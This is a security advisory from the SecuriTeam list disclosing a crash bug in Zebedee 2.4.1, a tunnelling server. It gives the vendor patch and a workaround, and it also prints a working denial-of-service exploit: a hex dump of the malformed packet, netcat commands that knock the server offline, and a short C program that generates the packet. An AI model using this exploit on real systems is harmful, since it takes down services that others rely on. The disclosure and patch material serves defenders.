The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Zebedee DoS
------------------------------------------------------------------------
SUMMARY
" <http://www.winton.org.uk/zebedee/> Zebedee is a simple program to
establish an encrypted, compressed tunnel for TCP/IP or UDP data
transfer between two systems." Lack of proper validation of the user
provided port range allows attackers to cause the Zebedee program to
crash.
DETAILS
Vulnerable Systems:
* Zebedee version 2.4.1
Immune Systems:
* Zebedee version 2.4.1a
The server crashes whenever "0" received as the port number in the
protocol option header.
$ od -tx1z -Ax zebedeeDoS
000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff >.... ...........<
000010 0b d8 30 b3 21 9c a6 74 00 00 00 00 >..0.!..t....<
00001c
The 9th and 10th byte of the header contains 0x00.
$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) open
sent 0, rcvd 0
$ nc -vv zebedeehost 11965 < zebedeeDoS
zebedeehost [192.168.xxx.xxx] 11965 (?) open
sent 28, rcvd 2
$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
sent 0, rcvd 0
$
In the zebedee.c, look at the function makeConnection() which called from
server(),
1703 /* Sanity check */
1704
1705 assert(host != NULL && port != 0);
1706
Here, if the port number is "0", both sub and parent processes seemed to
quit running.
This issue occurs when the "allowed redirection port" not set(in default).
Vendor Patch:
*** zebedee-2.4.1/zebedee.c Tue May 28 07:31:15 2002
--- zebedee-2.4.1A/zebedee.c Tue Sep 6 21:32:03 2005
***************
*** 22,28 ****
*/
char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15
ndwinton Exp $";
! #define RELEASE_STR "2.4.1"
#include <stdio.h>
#include <stdlib.h>
--- 22,28 ----
*/
char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15
ndwinton Exp $";
! #define RELEASE_STR "2.4.1A"
#include <stdio.h>
#include <stdlib.h>
***************
*** 3936,3941 ****
--- 3936,3950 ----
assert(AllowedTargets != NULL);
/*
+ ** Port 0 is invalid data in the request packet, never allowed
+ */
+ if (port == 0)
+ {
+ message(0, 0, "request for target port 0 disallowed");
+ return 0;
+ }
+
+ /*
** If the address is all zeroes then we will assume the default
target
** host, if any.
*/
Workaround:
Setting up allowed redirection ports will address this issue.
Exploit:
/*
$ gcc -o mkZebedeeDoS mkZebedeeDoS.c
$ ./mkZebedeeDoS > zebedeeDoS
$ nc targethost port < zebedeeDoS
*/
#include <stdio.h>
int main (int argc, char **argv)
{
int i, size;
char data[] = {
0x02, 0x01, // protocol version
0x00, 0x00, // flags
0x20, 0x00, // max message size
0x00, 0x06, // compression info
0x00, 0x00, // port request: value = 0x0
0x00, 0x80, // key length
0xff, 0xff, 0xff, 0xff, // key token
0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
0x00, 0x00, 0x00, 0x00 // target host address
};
size = 28;
for(i=0; i<size; i++){
printf("%c", data[i]);
}
return 0;
}
/* EoF */
ADDITIONAL INFORMATION
The information has been provided by <mailto:shiraishi@insi.co.jp>
Shiraishi.M.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
